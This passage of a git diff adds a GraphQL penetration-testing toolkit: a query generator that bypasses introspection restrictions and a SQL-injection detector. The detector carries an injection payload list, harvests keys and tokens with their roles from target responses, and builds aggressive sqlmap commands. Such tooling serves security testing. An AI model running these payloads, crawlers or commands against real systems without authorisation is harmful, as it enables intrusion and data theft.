sys +import argparse +from typing import Dict, Any, List, Optional + +# Allow running from any working directory +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +import core.introspection as core_intro +from core.http import build_headers +from core.output import RED, BLUE, YELLOW, CYAN, RESET + + +def print_banner(): + print(f""" +{YELLOW} + ██████╗ ██████╗ ███████╗███╗ ██╗ +██╔═══██╗██╔════╝ ██╔════╝████╗ ██║ +██║ ██║██║ ███╗█████╗ ██╔██╗ ██║ +██║▄▄ ██║██║ ██║██╔══╝ ██║╚██╗██║ +╚██████╔╝╚██████╔╝███████╗██║ ╚████║ + ╚══▀▀═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ v1.1 +{RESET} +{CYAN}made by gitblanc — https://github.com/gitblanc/QGen{RESET} +""") + + + +def extract_graphql_queries(introspection: Dict[str, Any]) -> List[Dict[str, Any]]: + """Extract query and mutation fields from an introspection response. + + Normalises both response shapes ({data:{__schema:...}} and {__schema:...}). + Each returned field dict gains a '_root' key ('query' or 'mutation'). + """ + schema = core_intro.extract_schema(introspection) + if not schema: + return [] + + types = schema.get("types") or [] + methods: List[Dict[str, Any]] = [] + + def _add_fields(type_name_ref, root_label: str): + if not isinstance(type_name_ref, dict): + return + type_name = type_name_ref.get("name") + if not type_name: + return + tdef = next((t for t in types if t.get("name") == type_name), None) + if tdef: + for f in (tdef.get("fields") or []): + methods.append({**f, "_root": root_label}) + + _add_fields(schema.get("queryType"), "query") + _add_fields(schema.get("mutationType"), "mutation") + return methods + + +def resolve_type(t: Any) -> Any: + """Unwrap NON_NULL / LIST wrappers to reach the named type.""" + while isinstance(t, dict) and t.get("ofType") is not None: + t = t["ofType"] + return t + + +def build_field_tree(field_type: Any, types: List[Dict[str, Any]], + depth: int = 0, visited: Optional[set] = None) -> str: + """Recursively build a GraphQL selection set string for an OBJECT type.""" + if visited is None: + visited = set() + + field_type = resolve_type(field_type) + name = field_type.get("name") if isinstance(field_type, dict) else None + + if name and name in visited: + return "" + if name: + visited.add(name) + if not isinstance(field_type, dict) or field_type.get("kind") != "OBJECT": + return "" + + obj = next((t for t in types if t.get("name") == field_type.get("name")), None) + if not obj or not obj.get("fields"): + return "" + + indent = " " * depth + result = "" + for f in obj["fields"]: + f_type = resolve_type(f["type"]) + f_name = f["name"] + if f_type.get("kind") == "OBJECT": + sub = build_field_tree(f["type"], types, depth + 1, visited.copy()) + result += f"{indent}{f_name} {{\n{sub}{indent}}}\n" + else: + result += f"{indent}{f_name}\n" + return result + + +def stringify_type(t: Any) -> str: + """Convert a GraphQL type tree dict to a readable type string (e.g. '[String!]').""" + if not isinstance(t, dict): + return "Unknown" + if t.get("kind") == "NON_NULL": + return f"{stringify_type(t['ofType'])}!" + if t.get("kind") == "LIST": + return f"[{stringify_type(t['ofType'])}]" + return t.get("name", "Unknown") + + +def build_input_object(type_ref: Any, types: List[Dict[str, Any]], + depth: int = 0, visited: Optional[set] = None) -> str: + """Expand an INPUT_OBJECT type into an inline example literal.""" + if visited is None: + visited = set() + + resolved = resolve_type(type_ref) + type_name = resolved.get("name") if isinstance(resolved, dict) else None + if not type_name or type_name in visited: + return "{}" + visited.add(type_name) + + type_obj = next((t for t in types if t.get("name") == type_name), None) + if not type_obj: + return "{}" + + input_fields = type_obj.get("inputFields") or [] + indent = " " * depth + inner_indent = " " * (depth + 1) + + parts = [] + for f in input_fields: + fname = f["name"] + if f.get("defaultValue") is not None: + parts.append(f"{inner_indent}{fname}: {f['defaultValue']}") + continue + val = format_input_value(f["type"], types, fname, depth + 1, visited.copy()) + parts.append(f"{inner_indent}{fname}: {val}") + + if not parts: + return "{}" + if depth == 0: + inner = ", ".join(p.strip() for p in parts) + return "{ " + inner + " }" + body = "\n".join(parts) + return "{\n" + body + f"\n{indent}}}" + + +def format_input_value(type_ref: Any, types: List[Dict[str, Any]], + field_name: Optional[str] = None, + depth: int = 0, + visited: Optional[set] = None) -> str: + """Generate a sensible example value for a given GraphQL type.""" + if not isinstance(type_ref, dict): + return '"example"' + if type_ref.get("kind") == "NON_NULL": + return format_input_value(type_ref["ofType"], types, field_name, depth, visited) + if type_ref.get("kind") == "LIST": + inner = format_input_value(type_ref["ofType"], types, field_name, depth + 1, visited) + return f"[{inner}]" + + kind = type_ref.get("kind") + name = type_ref.get("name", "") + + if kind == "SCALAR" or name in ("String", "ID", ""): + if field_name: + lname = field_name.lower() + if "pass" in lname: + return '"password123"' + if "email" in lname: + return f'"{field_name}@example.com"' + if "role" in lname: + return '"user"' + if "name" in lname: + return f'"{field_name}_example"' + if "msg" in lname or "message" in lname: + return f'"{field_name}_example"' + return '"example"' + if name in ("Int", "Float"): + return "0" + if name == "Boolean": + return "false" + + if kind == "ENUM" or any(t.get("name") == name and t.get("enumValues") for t in types): + tobj = next((t for t in types if t.get("name") == name), None) + if tobj: + vals = tobj.get("enumValues") or [] + if vals: + first = vals[0].get("name") + return first if first is not None else '"ENUM_VALUE"' + return '"ENUM_VALUE"' + + if kind == "INPUT_OBJECT" or any(t.get("name") == name and t.get("inputFields") for t in types): + return build_input_object(type_ref, types, depth, visited) + + return '"example"' + + +def generate_full_query(method_field: Dict[str, Any], + introspection: Dict[str, Any]) -> str: + """Build a complete GraphQL query/mutation for a given schema field.""" + schema = core_intro.extract_schema(introspection) + types = (schema.get("types") or []) if schema else [] + + args = method_field.get("args") or [] + variables: List[str] = [] + call_args: List[str] = [] + + for a in args: + var_name = a["name"] + resolved = resolve_type(a["type"]) + kind = resolved.get("kind") + type_name = resolved.get("name") + + is_input_obj = ( + kind == "INPUT_OBJECT" + or any(t.get("name") == type_name and t.get("inputFields") for t in types) + ) + if is_input_obj: + call_args.append(f"{var_name}: {build_input_object(a['type'], types)}") + else: + var_type = stringify_type(a["type"]) + variables.append(f"${var_name}: {var_type}") + call_args.append(f"{var_name}: ${var_name}") + + variables_str = f"({', '.join(variables)})" if variables else "" + call_args_str = f"({', '.join(call_args)})" if call_args else "" + + fields_tree = build_field_tree(method_field["type"], types, depth=2) + operation = method_field.get("_root", "query") + + return f""" +{operation} {method_field['name']}{variables_str} {{ + {method_field['name']}{call_args_str} {{ +{fields_tree} + }} +}}""".rstrip() + + +def save_query_to_file(method_name: str, query_text: str) -> None: + """Write a generated query to queries/.txt.""" + os.makedirs("queries", exist_ok=True) + path = f"queries/{method_name}.txt" + try: + with open(path, "w", encoding="utf-8") as f: + f.write(query_text) + print(f"[+] Query saved to: {path}\n") + except OSError as e: + print(f"[!] Error saving query: {e}") + + +def interactive_console(methods: List[Dict[str, Any]], + introspection: Dict[str, Any]) -> None: + print("Type 'help' to see available commands.\n") + + while True: + try: + raw_cmd = input(f"{RED}qgen ${RESET} ").strip() + except (EOFError, KeyboardInterrupt): + print("\n[+] Exiting.") + break + + # Pipe support: listMethods | grep + grep_text = None + if "|" in raw_cmd: + left, _, right = raw_cmd.partition("|") + raw_cmd = left.strip() + pipe_part = right.strip() + if pipe_part.startswith("grep"): + grep_text = pipe_part[4:].strip().lower() + else: + print("[!] Unsupported pipe command.\n") + continue + + cmd = raw_cmd + + # Allow bare number or exact method name as shorthand for 'use ' + if not cmd.startswith("use ") and cmd not in ("help", "listMethods", "exit", ""): + if cmd.isdigit(): + cmd = f"use {cmd}" + elif any(m["name"] == cmd for m in methods): + cmd = f"use {cmd}" + + if cmd == "help": + output = ( + "Available commands:\n" + " help - Show this help\n" + " listMethods - List all available GraphQL methods\n" + " use - Generate the full query for a method\n" + " exit - Exit\n" + ) + if grep_text: + output = "\n".join( + l for l in output.splitlines() if grep_text in l.lower() + ) + print(output) + + elif cmd == "listMethods": + lines = [] + for i, m in enumerate(methods, start=1): + label = "Q" if m.get("_root") == "query" else "M" + lines.append(f" [{i}] ({label}) {m['name']}") + if grep_text: + lines = [l for l in lines if grep_text in l.lower()] + print("\n[*] Available methods:") + for line in lines: + print(line) + print() + + elif cmd.startswith("use "): + _, _, value = cmd.partition(" ") + value = value.strip() + + if value.isdigit(): + idx = int(value) - 1 + if not 0 <= idx < len(methods): + print("[!] Invalid method number.\n") + continue + selected = methods[idx] + else: + selected = next((m for m in methods if m["name"] == value), None) + if not selected: + print(f"[!] Method {value!r} not found.\n") + continue + + print(f"[+] Selected: {selected['name']}\n") + try: + query = generate_full_query(selected, introspection) + print("\n" + "-" * 40) + print(f"{BLUE}{query}{RESET}") + print("-" * 40 + "\n") + save_query_to_file(selected["name"], query) + except Exception as e: + print(f"[!] Error generating query: {e}\n") + + elif cmd == "exit": + print("[+] Exiting.") + break + + elif cmd == "": + continue + + else: + print("[!] Unknown command. Type 'help' for the command list.\n") + + +def main(): + print_banner() + print("=== GraphQL Interactive Query Generator ===\n") + + parser = argparse.ArgumentParser(description="GraphQL Introspection CLI — query generator") + parser.add_argument("--url", metavar="URL", required=True, + help="GraphQL endpoint URL") + parser.add_argument("-H", "--header", action="append", default=[], + metavar="Name: Value", + help="HTTP header (repeatable)") + parser.add_argument("--cookie", metavar="FILE", + help="Cookie file (one line)") + args = parser.parse_args() + + headers = build_headers(args.header, args.cookie) + print(f"[*] Fetching introspection from {args.url} ...") + introspection, strategy = core_intro.fetch_with_bypass(args.url, headers) + if introspection is None: + print("[!] All introspection strategies failed — attempting error-based reconstruction...") + introspection = core_intro.reconstruct_schema_from_errors(args.url, headers) + if introspection is None: + print("[!] Could not obtain schema.") + sys.exit(1) + strategy = "error-reconstruction" + tag = f" (strategy: {strategy})" if strategy and strategy != "normal" else "" + print(f"[+] Schema obtained{tag}.\n") + + methods = extract_graphql_queries(introspection) + if not methods: + print("[!] No GraphQL methods found in the introspection.") + sys.exit(1) + + n_q = sum(1 for m in methods if m.get("_root") == "query") + n_m = sum(1 for m in methods if m.get("_root") == "mutation") + print(f"[+] Schema loaded: {n_q} queries, {n_m} mutations\n") + + interactive_console(methods, introspection) + + +if __name__ == "__main__": + main() diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..0cf5745 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,2 @@ +requests>=2.28.0 +colorama>=0.4.0 diff --git a/sqli/__init__.py b/sqli/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/sqli/sqli_detector.py b/sqli/sqli_detector.py new file mode 100644 index 0000000..dbbd579 --- /dev/null +++ b/sqli/sqli_detector.py @@ -0,0 +1,1062 @@ +#!/usr/bin/env python3 +from __future__ import annotations +import re +import json +import base64 +import hashlib +import argparse +import os +import time +import sys +from datetime import datetime, timezone +from typing import Any, Dict, List, Optional, Set, Tuple, Union +from urllib.parse import urlparse +from pathlib import Path +from itertools import product + +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +import requests +import core.introspection as core_intro +from core.output import Fore, Style +from core.http import parse_headers_input + +# SQLi payloads — string context (String / ID GraphQL args) +PAYLOADS = [ + '" OR "1"="1', + "' OR '1'='1", + "' OR 1=1--", + "admin' -- ", + "x' UNION SELECT NULL-- ", + '"\' OR 1=1 -- ', + "'", + "admin'/*", + 'admin"/*', +] + +# Ordered: specific / high-confidence first, broad patterns last. +SQL_ERROR_SIGS = [ + re.compile(r"you have an error in your sql syntax", re.I), + re.compile(r"near .+ syntax error|syntax error .+ near", re.I), # SQLite/MySQL "near X: syntax error" + re.compile(r"unterminated quoted string", re.I), # PostgreSQL + re.compile(r"ORA-\d{4,5}", re.I), # Oracle + re.compile(r"unclosed quotation mark", re.I), # MSSQL + re.compile(r"invalid column name", re.I), # MSSQL + re.compile(r"microsoft.*?odbc.*?sql|sql.*?odbc.*?microsoft", re.I), + re.compile(r"sqlexception", re.I), # Java JDBC + re.compile(r"sqlstate", re.I), + re.compile(r"sqlalchemy", re.I), # Python SQLAlchemy exceptions + re.compile(r"sqlite3?\.", re.I), # Python sqlite3 exception class names + re.compile(r"pymysql", re.I), + re.compile(r"psycopg", re.I), + re.compile(r"pg_query\(", re.I), + re.compile(r"column .+ does not exist", re.I), # PostgreSQL + re.compile(r"sql server", re.I), + # Broad patterns — kept for flexibility but ranked last + re.compile(r"mariadb", re.I), + re.compile(r"mysql", re.I), + re.compile(r"postgres", re.I), + re.compile(r"sqlite", re.I), +] + +TIMEOUT = 20 +REPRO_DIR = "repro-payloads" +INDEX_FILE = "index.json" +EVIDENCE_MAX_CHARS = 80 + +# TypeMap alias: a pre-built {name: type_def} dict for O(1) lookup. +# Functions accept either a list (schema_types) or dict (type_map). +_TypeRef = Union[List[Dict[str, Any]], Dict[str, Dict[str, Any]]] + +# -------------------- Utilities ------------------------------------------- + +def post_graphql(endpoint: str, headers: Dict[str, str], payload: Dict[str, Any], verbose: bool = False) -> Dict[str, Any]: + h = {"Content-Type": "application/json"} + h.update(headers or {}) + if verbose: + q = payload.get("query") if isinstance(payload, dict) else str(payload) + print(Fore.BLUE + Style.DIM + "[>] POST " + endpoint + " BODY: " + Style.RESET_ALL + (q[:800] + "..." if len(q) > 800 else q)) + try: + r = requests.post(endpoint, json=payload, headers=h, timeout=TIMEOUT) + try: + data = r.json() + except Exception: + data = {"_raw_text": r.text} + return {"status": r.status_code, "data": data} + except requests.RequestException as e: + return {"status": 0, "data": {"errors": [{"message": str(e)}]}} + +def extract_named_type(t: Optional[Dict[str, Any]]) -> Optional[str]: + if not t: + return None + if t.get("name"): + return t.get("name") + if t.get("ofType"): + return extract_named_type(t.get("ofType")) + return None + +def is_string_type(arg_type_name: Optional[str]) -> bool: + if not arg_type_name: + return False + return arg_type_name.lower() in ("string", "id", "varchar", "text") + +def find_type_definition(schema_types: _TypeRef, name: Optional[str]) -> Optional[Dict[str, Any]]: + """Locate a type definition by name. + + Accepts either a list of type dicts (O(n)) or a pre-built {name: def} + dict (O(1)). Build the dict once with _build_type_map() for hot paths. + """ + if not name: + return None + if isinstance(schema_types, dict): + return schema_types.get(name) + for t in schema_types: + if t.get("name") == name: + return t + return None + +def _build_type_map(types: List[Dict[str, Any]]) -> Dict[str, Dict[str, Any]]: + return {t["name"]: t for t in types if isinstance(t, dict) and t.get("name")} + +def pick_scalar_field_for_type(type_def: Optional[Dict[str, Any]], schema_types: _TypeRef) -> Optional[str]: + if not type_def or not type_def.get("fields"): + return None + for f in type_def.get("fields", []): + tname = extract_named_type(f.get("type")) + if not tname: + continue + if tname.lower() in ("string", "int", "float", "boolean", "id", "integer"): + return f.get("name") + td = find_type_definition(schema_types, tname) + if not td or not td.get("fields"): + return f.get("name") + return None + +def normalize_resp(data: Any) -> str: + try: + return json.dumps(data, sort_keys=True, ensure_ascii=False) + except Exception: + return str(data) + +def truncate_str(s: str, n: int = 180) -> str: + if s is None: + return "" + s = str(s) + return s if len(s) <= n else s[:n] + "..." + +def build_query(field_name: str, args_dict: Dict[str, str], selection: Optional[str]) -> Dict[str, Any]: + if args_dict: + args_str = ", ".join([f'{k}: {json.dumps(v)}' for k, v in args_dict.items()]) + q = f'query {{ {field_name}({args_str}) {{ {selection} }} }}' if selection else f'query {{ {field_name}({args_str}) }}' + else: + q = f'query {{ {field_name} {{ {selection} }} }}' if selection else f'query {{ {field_name} }}' + return {"query": q} + +def _sanitize_name(s: str) -> str: + return re.sub(r"[^\w\-]+", "_", s)[:64] + +def _write_raw_http(endpoint: str, headers: Dict[str, str], body_json: Dict[str, Any], fname: str) -> str: + repro_dir = Path.cwd() / REPRO_DIR + repro_dir.mkdir(parents=True, exist_ok=True) + parsed = urlparse(endpoint) + path = parsed.path or "/" + if parsed.query: + path = path + "?" + parsed.query + hdrs: Dict[str, str] = {"Host": parsed.netloc} + for k, v in (headers or {}).items(): + if k.lower() == "host": + hdrs["Host"] = v + else: + hdrs[k] = v + if not any(k.lower() == "content-type" for k in hdrs): + hdrs["Content-Type"] = "application/json" + body_str = json.dumps(body_json, ensure_ascii=False) + fpath = repro_dir / fname + lines = [f"POST {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()] + ["", body_str] + with open(fpath, "w", encoding="utf-8") as fh: + fh.write("\r\n".join(lines) + "\r\n") + return str(fpath) + +def _read_index() -> Dict[str, Any]: + idx_path = Path(REPRO_DIR) / INDEX_FILE + if not idx_path.exists(): + return {} + try: + with open(idx_path, "r", encoding="utf-8") as fh: + return json.load(fh) + except Exception: + return {} + +def _write_index(idx: Dict[str, Any]) -> None: + idx_path = Path(REPRO_DIR) + idx_path.mkdir(parents=True, exist_ok=True) + with open(idx_path / INDEX_FILE, "w", encoding="utf-8") as fh: + json.dump(idx, fh, ensure_ascii=False, indent=2) + +# -------------------- Crawling / extraction -------------------------------- + +def seed_field_queries(field: Dict[str, Any], type_ref: _TypeRef, + page_sizes: List[int], max_items: int) -> List[str]: + fname = field.get("name") + return_type_name = extract_named_type(field.get("type")) + ret_def = find_type_definition(type_ref, return_type_name) + scalars = [] + if ret_def and ret_def.get("fields"): + for f in ret_def.get("fields", [])[:20]: + fn = f.get("name") + if fn and not fn.startswith("__"): + scalars.append(fn) + if not scalars: + scalars = ["__typename"] + selection = " ".join(scalars[:8]) + queries = [f'query {{ {fname} {{ {selection} }} }}'] + for n in page_sizes: + queries.append(f'query {{ {fname}(first: {n}) {{ edges {{ node {{ {selection} }} }} }} }}') + for n in page_sizes: + queries.append(f'query {{ {fname}(first: {n}) {{ {selection} }} }}') + return queries + +def get_field_from_response(resp_data: Any, field_name: str) -> Any: + if not resp_data: + return None + if isinstance(resp_data, dict): + if "data" in resp_data and isinstance(resp_data["data"], dict): + return resp_data["data"].get(field_name) + if field_name in resp_data: + return resp_data.get(field_name) + return None + +def _pretty_print_extracted_values(extracted_values: Dict[str, Set[str]], key_roles: Dict[str, str], max_per_key: int = 6): + if not extracted_values and not key_roles: + print(Fore.YELLOW + "[*] No extracted values found.") + return + print(Fore.CYAN + "[*] Extracted values (sample):") + if key_roles: + print(Fore.MAGENTA + " Key -> role mappings:") + for k, r in list(key_roles.items())[:10]: + print(Fore.MAGENTA + f" {k} -> {r}") + if extracted_values: + print(Fore.CYAN + " Field -> values:") + for key in sorted(extracted_values.keys()): + sample = list(extracted_values[key])[:max_per_key] + print(Fore.CYAN + f" {key}: " + Fore.WHITE + f"{json.dumps(sample, ensure_ascii=False)}" + Style.RESET_ALL) + +def try_decode_global_id(val: str) -> Optional[Tuple[str, str]]: + if not isinstance(val, str) or len(val) < 8: + return None + if not re.fullmatch(r'[A-Za-z0-9+/=]+', val): + return None + try: + decoded = base64.b64decode(val + '===').decode('utf-8', errors='ignore') + except Exception: + return None + if ':' in decoded: + parts = decoded.split(':', 1) + return parts[0].strip(), parts[1].strip() + return None + +def simple_name_match_values(arg_name: str, extracted_values: Dict[str, Set[str]]) -> List[str]: + an = (arg_name or "").lower() + if an in extracted_values: + return list(extracted_values[an])[:5] + candidates = [] + for k, vals in extracted_values.items(): + kn = k.lower() + if an in kn or kn in an: + candidates.extend(list(vals)[:3]) + if 'key' in an and 'key' in extracted_values: + candidates = list(extracted_values['key'])[:5] + candidates + if 'token' in an and 'token' in extracted_values: + candidates = list(extracted_values['token'])[:5] + candidates + seen: Set[str] = set() + res = [] + for v in candidates: + if v not in seen: + res.append(v) + seen.add(v) + if len(res) >= 5: + break + return res + +def _collect_key_roles(rdata: Any, key_roles: Dict[str, str], max_items: int) -> None: + """Extract key→role mappings from a crawled response value.""" + items: List[Any] = rdata if isinstance(rdata, list) else ([rdata] if isinstance(rdata, dict) else []) + for it in items[:max_items]: + if isinstance(it, dict): + key = it.get("key") or it.get("apiKey") or it.get("token") + role = it.get("role") + if key and role: + key_roles[key] = role + +def crawl_and_extract_values(endpoint: str, + headers: Dict[str, str], + query_fields: List[Dict[str, Any]], + types: List[Dict[str, Any]], + max_depth: int = 2, + max_requests: int = 250, + max_items_per_list: int = 10, + delay: float = 0.0, + verbose: bool = False) -> Tuple[Dict[str, Set[str]], Dict[str, str]]: + """Crawl argument-less query fields to seed argument values for SQLi testing.""" + print(Fore.CYAN + "[*] Crawling schema to extract values for candidate inputs...") + type_map = _build_type_map(types) + extracted_values: Dict[str, Set[str]] = {} + key_roles: Dict[str, str] = {} + requests_made = 0 + visited: Set[Tuple[str, str]] = set() + page_sizes = [10, 50, 100] + + def collect(obj: Any, prefix: Optional[str] = None): + if isinstance(obj, dict): + if 'edges' in obj and isinstance(obj['edges'], list): + for e in obj['edges'][:max_items_per_list]: + if isinstance(e, dict) and 'node' in e: + collect(e['node'], prefix) + return + for k, v in obj.items(): + if k.startswith("__"): + continue + if isinstance(v, str) and v: + extracted_values.setdefault(k, set()).add(v) + elif isinstance(v, list): + for it in v[:max_items_per_list]: + collect(it, prefix=k) + elif isinstance(v, dict): + collect(v, prefix=k) + elif isinstance(obj, list): + for it in obj[:max_items_per_list]: + collect(it, prefix=prefix) + + for field in query_fields: + if requests_made >= max_requests: + break + fname = field.get("name") + if not fname or fname.startswith("__"): + continue + if field.get("args"): + continue + for q in seed_field_queries(field, type_map, page_sizes, max_items_per_list): + if requests_made >= max_requests: + break + if verbose: + print(Fore.BLUE + "[>] Seed query: " + truncate_str(q, 800)) + resp = post_graphql(endpoint, headers, {"query": q}, verbose=verbose) + requests_made += 1 + rdata = get_field_from_response(resp.get("data"), fname) + if rdata: + collect(rdata) + _collect_key_roles(rdata, key_roles, max_items_per_list) + if delay and requests_made < max_requests: + time.sleep(delay) + + # Decode base64 / Relay global IDs to surface numeric IDs + added_decoded = 0 + for key, vals in list(extracted_values.items()): + for v in list(vals)[:200]: + d = try_decode_global_id(v) + if d: + typ, idv = d + extracted_values.setdefault("id", set()).add(idv) + extracted_values.setdefault(f"{typ.lower()}Id", set()).add(idv) + added_decoded += 1 + if added_decoded: + print(Fore.GREEN + f"[+] Decoded {added_decoded} global/base64 id(s)") + + # BFS: follow fields that accept id-like args using the extracted IDs + depth = 0 + while depth < max_depth and requests_made < max_requests: + progress = False + id_candidates: List[str] = list(extracted_values.get("id", [])) + for k in list(extracted_values.keys()): + if k.lower().endswith("id") and k.lower() != "id": + id_candidates.extend(list(extracted_values[k])[:50]) + for vals in extracted_values.values(): + for v in list(vals)[:50]: + if try_decode_global_id(v): + id_candidates.append(v) + id_candidates = list(dict.fromkeys(id_candidates))[:500] + + for field in query_fields: + if requests_made >= max_requests: + break + fname = field.get("name") + if not fname or fname.startswith("__"): + continue + args = field.get("args") or [] + if not args: + continue + id_arg_names = [a.get("name") for a in args if a.get("name") and 'id' in a.get("name").lower()] + if not id_arg_names: + continue + candidates_per_arg = [] + for an in id_arg_names: + vals = list(extracted_values.get(an, []))[:6] or id_candidates[:6] or ["1"] + candidates_per_arg.append(vals) + combos = [] + for prod in product(*candidates_per_arg): + args_dict = {id_arg_names[i]: prod[i] for i in range(len(id_arg_names))} + ahash = hashlib.sha1(json.dumps({"f": fname, "args": args_dict}, sort_keys=True).encode()).hexdigest() + if (fname, ahash) not in visited: + combos.append((args_dict, ahash)) + if len(combos) >= 6: + break + for args_dict, ahash in combos: + if requests_made >= max_requests: + break + visited.add((fname, ahash)) + return_type_name = extract_named_type(field.get("type")) + ret_def = type_map.get(return_type_name) + sel = None + if ret_def and ret_def.get("fields"): + sel = pick_scalar_field_for_type(ret_def, type_map) or ret_def["fields"][0].get("name") + q_str = (build_query(fname, args_dict, sel) or {}).get("query", "") + if verbose: + print(Fore.BLUE + "[>] Follow query: " + truncate_str(q_str, 800)) + resp = post_graphql(endpoint, headers, {"query": q_str}, verbose=verbose) + requests_made += 1 + progress = True + rdata = get_field_from_response(resp.get("data"), fname) + if rdata: + collect(rdata) + _collect_key_roles(rdata, key_roles, max_items_per_list) + if delay and requests_made < max_requests: + time.sleep(delay) + if not progress: + break + + new_decoded = 0 + for key, vals in list(extracted_values.items()): + for v in list(vals)[:200]: + d = try_decode_global_id(v) + if d: + typ, idv = d + if idv not in extracted_values.get("id", set()): + extracted_values.setdefault("id", set()).add(idv) + extracted_values.setdefault(f"{typ.lower()}Id", set()).add(idv) + new_decoded += 1 + if new_decoded: + print(Fore.GREEN + f"[+] Decoded {new_decoded} additional global/base64 id(s)") + depth += 1 + + total_vals = sum(len(v) for v in extracted_values.values()) + if total_vals: + print(Fore.GREEN + f"[+] Crawled and extracted {total_vals} values from {len(extracted_values)} distinct keys (requests made: {requests_made})") + if key_roles: + print(Fore.GREEN + f"[+] Found {len(key_roles)} key->role mappings during crawl") + _pretty_print_extracted_values(extracted_values, key_roles) + return extracted_values, key_roles + +# -------------------- Grouping & printing (left-aligned compact) ----------- + +def group_findings_by_param(findings: List[Dict[str, Any]], endpoint: str) -> Dict[str, Any]: + grouped: Dict[str, Any] = {} + for f in findings: + param = f.get("arg") or "unknown" + field = f.get("field") or "" + args_context = dict(f.get("args_used") or {}) + args_context.pop(param, None) + payload = f.get("payload") + evidence_type = f.get("type") or "" + evidence_text = f.get("evidence") or "" + repro = f.get("repro") or "" + recommended_cmd = f.get("recommended_cmd") or (_build_sqlmap_cmd_marker(repro) if repro else "") + timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + confidence = compute_confidence(evidence_type, payload or "", bool(repro)) + occ_list = grouped.setdefault(param, {"occurrences": {}, "aggregate": {}}) + occ_key = f"{field} @ {endpoint}" + occ = occ_list["occurrences"].setdefault(occ_key, {"field": field, "endpoint": endpoint, "args_context": args_context, "findings": []}) + occ["findings"].append({ + "payload": payload, + "evidence_type": evidence_type, + "evidence": evidence_text, + "attack_response": truncate_str(str(f.get("attack_response")), 1000), + "base_response": truncate_str(str(f.get("base_response")), 1000), + "repro": repro, + "recommended_cmd": recommended_cmd, + "timestamp": timestamp, + "confidence": confidence, + "args_used": f.get("args_used") + }) + for param, data in list(grouped.items()): + occs = [] + all_payloads: Set = set() + max_conf = 0.0 + for v in data["occurrences"].values(): + occs.append(v) + for fin in v.get("findings", []): + all_payloads.add(fin.get("payload")) + if fin.get("confidence", 0) > max_conf: + max_conf = fin.get("confidence", 0) + data["occurrences"] = occs + data["aggregate"] = { + "unique_payloads": len(all_payloads), + "total_evidences": sum(len(o.get("findings", [])) for o in occs), + "max_confidence": max_conf, + "fields_affected": len(occs), + "severity": "high" if max_conf >= 0.75 else "medium" if max_conf >= 0.45 else "low", + "notes": "" + } + return grouped + +def print_grouped_summary(grouped: Dict[str, Any]): + if not grouped: + return + params = sorted(grouped.items(), key=lambda kv: (0 if kv[1].get("aggregate", {}).get("severity") == "high" else 1, kv[0])) + print(Fore.MAGENTA + "\n[*] Findings grouped by vulnerable parameter:\n") + for idx, (param, data) in enumerate(params, start=1): + print(f"[{idx}] {Fore.RED}{param}{Style.RESET_ALL}") + for occ in data.get("occurrences", []): + for fin in occ.get("findings", []): + payload = fin.get("payload") + payload_display = payload if payload is not None else json.dumps(fin.get("args_used") or {}, ensure_ascii=False) + print(" " + Fore.YELLOW + "Payload: " + Style.RESET_ALL + f"{payload_display}") + etype = fin.get("evidence_type") or "" + print(" " + Fore.CYAN + "Type: " + Style.RESET_ALL + etype) + evidence = fin.get("evidence") or "" + cleaned = re.sub(r"\s+", " ", evidence).strip() + cleaned = re.sub(r"\[SQL: .*", "[SQL TRACE]", cleaned, flags=re.S) + if len(cleaned) > EVIDENCE_MAX_CHARS: + cleaned = cleaned[:EVIDENCE_MAX_CHARS - 3].rstrip() + "..." + if re.search(r"\[SQL TRACE\]", evidence, flags=re.I) and "[SQL TRACE]" not in cleaned: + cleaned += " [SQL TRACE]" + print(" " + Fore.BLUE + "Evidence: " + Style.RESET_ALL + cleaned) + print("") + first_repro = next((fin.get("repro") for fin in occ.get("findings", []) if fin.get("repro")), None) + if first_repro: + cmd = _build_sqlmap_cmd_marker(first_repro) + print(Fore.MAGENTA + "Recommended sqlmap command:" + Style.RESET_ALL) + print(Fore.MAGENTA + f"{cmd}" + Style.RESET_ALL) + print("") + +# -------------------- Detection flow (markers, checks) --------------------- + +def _canonical_marker_key(endpoint: str, field: str, arg: str, context_args: Dict[str, Any]) -> str: + arg_names = sorted(list(context_args.keys())) if isinstance(context_args, dict) else [] + return "|".join([endpoint, field, arg, ",".join(arg_names)]) + +def write_or_update_marker(endpoint: str, headers: Dict[str, str], attack_query: str, + field: str, arg: str, payload: str, + context_args: Dict[str, Any], + evidence_type: Optional[str], evidence_text: Optional[str]) -> str: + escaped_payload = json.dumps(payload) + escaped_marker = json.dumps("*") + if escaped_payload in attack_query: + marker_query = attack_query.replace(escaped_payload, escaped_marker, 1) + elif payload in attack_query: + # Payload appears unescaped — replace directly + marker_query = attack_query.replace(payload, "*", 1) + else: + marker_query = attack_query # Fallback: couldn't locate payload; keep as-is + + canonical = _canonical_marker_key(endpoint, field, arg, context_args or {}) + short_hash = hashlib.sha1(canonical.encode("utf-8")).hexdigest()[:8] + filename = f"{_sanitize_name(field)}_{_sanitize_name(arg)}_{short_hash}_marker.http" + + repro_dir = Path(REPRO_DIR) + repro_dir.mkdir(parents=True, exist_ok=True) + marker_path = repro_dir / filename + + if not marker_path.exists(): + _write_raw_http(endpoint, headers, {"query": marker_query}, filename) + + idx = _read_index() + entry = idx.get(filename) or { + "endpoint": endpoint, + "field": field, + "arg": arg, + "context_arg_names": sorted(list((context_args or {}).keys())), + "evidences": [] + } + + ts = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + repro_rel = str(marker_path) + recommended_cmd = _build_sqlmap_cmd_marker(repro_rel) + + evidence_record = { + "payload": payload, + "evidence_type": evidence_type or "", + "evidence": evidence_text or "", + "timestamp": ts, + "repro": repro_rel, + "recommended_cmd": recommended_cmd + } + + if not any(e.get("payload") == payload and e.get("evidence") == evidence_text for e in entry.get("evidences", [])): + entry.setdefault("evidences", []).append(evidence_record) + idx[filename] = entry + _write_index(idx) + return str(marker_path) + +def _build_sqlmap_cmd_marker(repro_marker_path: str) -> str: + return (f"sqlmap --level 5 --risk 3 -r '{repro_marker_path}' " + f"-p \"JSON[query]\" --batch 